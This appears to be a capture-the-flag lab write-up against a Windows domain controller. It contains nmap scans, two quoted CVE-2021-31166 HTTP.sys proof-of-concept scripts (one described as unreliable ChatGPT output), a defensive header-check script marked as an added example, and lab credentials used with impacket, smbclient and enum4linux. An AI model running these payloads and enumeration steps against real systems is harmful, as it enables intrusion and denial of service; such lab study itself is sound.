Windows, start~
Enumeration
└─# nmap -p- -sT --min-rate=10000 10.129.2.205
Starting Nmap 7.94SVN ( https://nmap.org/ ) at 2024-11-26 18:48 KST
Warning: 10.129.2.205 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.2.205
Host is up (0.28s latency).
Not shown: 59555 closed tcp ports (conn-refused), 5956 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
61518/tcp open unknown
61523/tcp open unknown
61526/tcp open unknown
61543/tcp open unknown
Has it begun..
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-26 16:52:09Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
| Message signing enabled and required
| smb2-time:
| date: 2024-11-26T16:53:02
|_ start_date: N/A
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.24 seconds
Poking around to see whether there is anything on the httpapi side.
Ah, anonymous FTP doesn't work either,
https://github.com/0vercl0k/CVE-2021-31166?tab=readme-ov-file
GitHub - 0vercl0k/CVE-2021-31166: Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.
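There's no way this works, haha.
Since I linked it, to explain..
=> A remote code execution (RCE) vulnerability found in the Windows HTTP Protocol Stack (HTTP.sys)
=> When an attacker remotely sends a maliciously crafted HTTP request, it abuses the HTTP Protocol Stack's memory management (a UAF, no less) to execute code
- Vulnerability ID: CVE-2021-31166
- CVSS score: 9.8 (Critical)
- Vulnerability type: Remote Code Execution (RCE)
- Affected systems:
  - Windows 10 version 2004 (Build 19041.985)
  - Windows 10 version 20H2 (Build 19042.985)
  - Windows Server 20H2
- Patch: Microsoft provided a patch in the May 11, 2021 security update.
Cause of the vulnerability
HTTP.sys is the driver responsible for HTTP protocol handling in Windows. Memory is not managed properly while it processes an HTTP request, which can lead to memory corruption. This vulnerability is related to the handling of range requests (range header) in the HTTP headers, and a crafted header value can trigger memory corruption.
- The attacker sends a maliciously designed HTTP request and corrupts memory through HTTP.sys on the target server.
- This can result in arbitrary code execution with kernel privileges or a DoS.
Conditions for exploitation
- A Windows system with HTTP.sys enabled:
  - HTTP.sys is used by IIS (Internet Information Services) and HTTP-based services.
  - A service that uses HTTP.sys must be enabled on the target system.
- Network reachability:
  - The attacker can send HTTP requests over the local network or the internet to attack the system.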
This is what ChatGPT gave me:
import socket
# Set the target IP and port
target = "192.168.1.10"  # must be changed
port = 80
# Build the malicious HTTP request
payload = (
    "GET / HTTP/1.1\r\n"
    "Host: {}\r\n".format(target) +
    "Range: bytes=0-18446744073709551615\r\n"  # crafted Range header
    "\r\n"
)
# Create the socket and send
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, port))
    s.send(payload.encode())
    response = s.recv(1024)
    print(response.decode())
# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse
def main():
    parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required = True)
    args = parser.parse_args()
    r = requests.get(f'http://{args.target}/', headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)
main()
I can't trust either of them.
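A defender-side check for the header shape used in the second PoC above, as an added example that is not from the original post or from the PoC's author: it parses raw HTTP request headers and flags Accept-Encoding values that contain empty or malformed list elements. Treating that shape as the signal is an assumption drawn from the quoted PoC; the function names and sample requests are constructed for illustration.

```python
import re

# One content-coding element: an HTTP token with an optional q-value,
# e.g. "gzip" or "br;q=0.8".
_CODING = re.compile(r"^[A-Za-z0-9!#$%&'*+.^_`|~-]+(\s*;\s*q=[01](\.\d{0,3})?)?$")


def parse_headers(raw_request):
    """Map lower-cased header names to their values for one raw HTTP request."""
    headers = {}
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def accept_encoding_findings(raw_request):
    """Describe every suspicious element in the Accept-Encoding header(s)."""
    findings = []
    for value in parse_headers(raw_request).get("accept-encoding", []):
        if value == "":
            continue  # an empty header value is legal and means "identity only"
        for pos, element in enumerate(e.strip() for e in value.split(",")):
            if element == "":
                # Real clients rarely send ", ," or a trailing comma.
                findings.append(f"empty list element at position {pos}")
            elif not _CODING.match(element):
                findings.append(f"malformed coding {element!r} at position {pos}")
    return findings


def scan(raw_requests):
    """Return (index, findings) for each request that has at least one finding."""
    results = []
    for index, raw in enumerate(raw_requests):
        found = accept_encoding_findings(raw)
        if found:
            results.append((index, found))
    return results


# Constructed sample requests (not captured traffic).
BROWSER_LIKE = ("GET / HTTP/1.1\r\nHost: web01.example\r\n"
                "Accept-Encoding: gzip, deflate, br\r\n\r\n")
POC_SHAPED = ("GET / HTTP/1.1\r\nHost: web01.example\r\n"
              "Accept-Encoding: doar-e, ftw, imo, ,\r\n\r\n")
WITH_QVALUES = ("GET / HTTP/1.1\r\nHost: web01.example\r\n"
                "Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0\r\n\r\n")
SAMPLES = [BROWSER_LIKE, POC_SHAPED, WITH_QVALUES]

if __name__ == "__main__":
    for index, found in scan(SAMPLES):
        print(f"request {index}: {'; '.join(found)}")
```

Unknown coding names such as `doar-e` are valid tokens and are not flagged on their own; only the empty elements are.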
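Meanwhile, a colleague discovered that the account credentials are shown when the server is restarted~
In my excitement (excitement? This is absurd.. absurd? Say, Mr. Face Reader..) I even created a computer account,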
└─# python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -dc-ip 10.129.2.205 administrator.htb0/olivia:ichliebedich -computer-name NEWCOMPUTER$
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account NEWCOMPUTER$ with password G5NGEcQcVSgeQu2VTEXvWJ1OfW3Q0sjW.
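Well, logging in as the olivia account with evil-winrm works.
I uploaded SharpHound and dumped the files,
then tried BloodHound, but the locally installed BloodHound seems to be behaving strangely.
I'll try it with Docker next time....
Ah.. keeping the enum4linux results here..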
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient -L 10.129.2.205 -U Olivia
Password for [WORKGROUP\Olivia]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.2.205 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient //10.129.2.205/C$ -U Olivia
Password for [WORKGROUP\Olivia]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient //10.129.2.205/C$ -U Olivia
Password for [WORKGROUP\Olivia]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient //10.129.2.205/NETLOGON -U Olivia
Password for [WORKGROUP\Olivia]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:54:15 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> cd ..
smb: \> ls
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:54:15 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:54:15 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> exut
exut: command not found
smb: \> exit
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient //10.129.2.205/SYSVOL -U Olivia
Password for [WORKGROUP\Olivia]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:48:08 2024
administrator.htb Dr 0 Sat Oct 5 04:48:08 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> cd administrator.htb\
smb: \administrator.htb\> dir
. D 0 Sat Oct 5 04:54:15 2024
.. D 0 Sat Oct 5 04:48:08 2024
DfsrPrivate DHSr 0 Sat Oct 5 04:54:15 2024
Policies D 0 Sat Oct 5 04:48:32 2024
scripts D 0 Sat Oct 5 04:48:08 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \administrator.htb\> cd DfsrPrivate\
cd \administrator.htb\DfsrPrivate\: NT_STATUS_ACCESS_DENIED
smb: \administrator.htb\> cd scripts
smb: \administrator.htb\scripts\> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:54:15 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \administrator.htb\scripts\> cd ..
smb: \administrator.htb\> cd Polices
cd \administrator.htb\Polices\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \administrator.htb\> cd ..
smb: \> cd ..
smb: \> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:48:08 2024
administrator.htb Dr 0 Sat Oct 5 04:48:08 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> cd .
smb: \> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:48:08 2024
administrator.htb Dr 0 Sat Oct 5 04:48:08 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> enum4linux -a -u
enum4linux: command not found
smb: \> exit
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# enum4linux -a -u Olivia -p ichliebedich 10.129.2.205
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov 26 21:18:28 2024
=========================================( Target Information )=========================================
Target ........... 10.129.2.205
RID Range ........ 500-550,1000-1050
Username ......... 'Olivia'
Password ......... 'ichliebedich'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.129.2.205 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.129.2.205 )================================
Looking up status of 10.129.2.205
No reply from 10.129.2.205
===================================( Session Check on 10.129.2.205 )===================================
[+] Server 10.129.2.205 allows sessions using username 'Olivia', password 'ichliebedich'
================================( Getting domain SID for 10.129.2.205 )================================
Domain Name: ADMINISTRATOR
Domain Sid: S-1-5-21-1088858960-373806567-254189436
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.129.2.205 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.129.2.205 from srvinfo:
10.129.2.205 Wk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
=======================================( Users on 10.129.2.205 )=======================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfc0 RID: 0xe11 acb: 0x00000211 Account: alexander Name: Alexander Smith Desc: (null)
index: 0xfb8 RID: 0x456 acb: 0x00000210 Account: benjamin Name: Benjamin Brown Desc: (null)
index: 0xfbe RID: 0x458 acb: 0x00000210 Account: emily Name: Emily Rodriguez Desc: (null)
index: 0xfc1 RID: 0xe12 acb: 0x00000211 Account: emma Name: Emma Johnson Desc: (null)
index: 0xfbf RID: 0x459 acb: 0x00000210 Account: ethan Name: Ethan Hunt Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfb7 RID: 0x455 acb: 0x00000210 Account: michael Name: Michael Williams Desc: (null)
index: 0xfb6 RID: 0x454 acb: 0x00000214 Account: olivia Name: Olivia Johnson Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[olivia] rid:[0x454]
user:[michael] rid:[0x455]
user:[benjamin] rid:[0x456]
user:[emily] rid:[0x458]
user:[ethan] rid:[0x459]
user:[alexander] rid:[0xe11]
user:[emma] rid:[0xe12]
=================================( Share Enumeration on 10.129.2.205 )=================================
do_connect: Connection to 10.129.2.205 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.2.205
//10.129.2.205/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.205/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NO_SUCH_FILE listing \*
//10.129.2.205/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//10.129.2.205/NETLOGON Mapping: OK Listing: OK Writing: N/A
//10.129.2.205/SYSVOL Mapping: OK Listing: OK Writing: N/A
============================( Password Policy Information for 10.129.2.205 )============================
[+] Attaching to 10.129.2.205 using Olivia:ichliebedich
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.2.205)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] ADMINISTRATOR
[+] Builtin
[+] Password Info for Domain: ADMINISTRATOR
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
=======================================( Groups on 10.129.2.205 )=======================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Remote Management Users' (RID: 580) has member: ADMINISTRATOR\olivia
Group: Remote Management Users' (RID: 580) has member: ADMINISTRATOR\michael
Group: Remote Management Users' (RID: 580) has member: ADMINISTRATOR\emily
Group: Administrators' (RID: 544) has member: ADMINISTRATOR\Administrator
Group: Administrators' (RID: 544) has member: ADMINISTRATOR\Enterprise Admins
Group: Administrators' (RID: 544) has member: ADMINISTRATOR\Domain Admins
Group: Guests' (RID: 546) has member: ADMINISTRATOR\Guest
Group: Guests' (RID: 546) has member: ADMINISTRATOR\Domain Guests
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: ADMINISTRATOR\Domain Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
group:[Share Moderators] rid:[0x457]
[+] Getting local group memberships:
Group: Share Moderators' (RID: 1111) has member: ADMINISTRATOR\benjamin
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Read-only Domain Controllers
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
[+] Getting domain group memberships:
Group: 'Domain Controllers' (RID: 516) has member: ADMINISTRATOR\DC$
Group: 'Domain Guests' (RID: 514) has member: ADMINISTRATOR\Guest
Group: 'Enterprise Admins' (RID: 519) has member: ADMINISTRATOR\Administrator
Group: 'Schema Admins' (RID: 518) has member: ADMINISTRATOR\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: ADMINISTRATOR\Administrator
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\Administrator
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\krbtgt
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\olivia
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\michael
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\benjamin
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\emily
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\ethan
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\alexander
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\emma
Group: 'Domain Admins' (RID: 512) has member: ADMINISTRATOR\Administrator
==================( Users on 10.129.2.205 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-5-21-1088858960-373806567-254189436
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-21-1088858960-373806567-254189436
[+] Enumerating users using SID S-1-5-21-222597205-3069252932-3630732940 and logon username 'Olivia', password 'ichliebedich'
S-1-5-21-222597205-3069252932-3630732940-500 DC\Administrator (Local User)
S-1-5-21-222597205-3069252932-3630732940-501 DC\Guest (Local User)
S-1-5-21-222597205-3069252932-3630732940-503 DC\DefaultAccount (Local User)
S-1-5-21-222597205-3069252932-3630732940-504 DC\WDAGUtilityAccount (Local User)
S-1-5-21-222597205-3069252932-3630732940-513 DC\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username 'Olivia', password 'ichliebedich'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'Olivia', password 'ichliebedich'
[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'Olivia', password 'ichliebedich'
[+] Enumerating users using SID S-1-5-90 and logon username 'Olivia', password 'ichliebedich'
[+] Enumerating users using SID S-1-5-21-1088858960-373806567 and logon username 'Olivia', password 'ichliebedich'
[+] Enumerating users using SID S-1-5-21-1088858960-373806567-254189436 and logon username 'Olivia', password 'ichliebedich'
S-1-5-21-1088858960-373806567-254189436-500 ADMINISTRATOR\Administrator (Local User)
S-1-5-21-1088858960-373806567-254189436-501 ADMINISTRATOR\Guest (Local User)
S-1-5-21-1088858960-373806567-254189436-502 ADMINISTRATOR\krbtgt (Local User)
S-1-5-21-1088858960-373806567-254189436-512 ADMINISTRATOR\Domain Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-513 ADMINISTRATOR\Domain Users (Domain Group)
S-1-5-21-1088858960-373806567-254189436-514 ADMINISTRATOR\Domain Guests (Domain Group)
S-1-5-21-1088858960-373806567-254189436-515 ADMINISTRATOR\Domain Computers (Domain Group)
S-1-5-21-1088858960-373806567-254189436-516 ADMINISTRATOR\Domain Controllers (Domain Group)
S-1-5-21-1088858960-373806567-254189436-517 ADMINISTRATOR\Cert Publishers (Local Group)
S-1-5-21-1088858960-373806567-254189436-518 ADMINISTRATOR\Schema Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-519 ADMINISTRATOR\Enterprise Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-520 ADMINISTRATOR\Group Policy Creator Owners (Domain Group)
S-1-5-21-1088858960-373806567-254189436-521 ADMINISTRATOR\Read-only Domain Controllers (Domain Group)
S-1-5-21-1088858960-373806567-254189436-522 ADMINISTRATOR\Cloneable Domain Controllers (Domain Group)
S-1-5-21-1088858960-373806567-254189436-525 ADMINISTRATOR\Protected Users (Domain Group)
S-1-5-21-1088858960-373806567-254189436-526 ADMINISTRATOR\Key Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-527 ADMINISTRATOR\Enterprise Key Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-1000 ADMINISTRATOR\DC$ (Local User)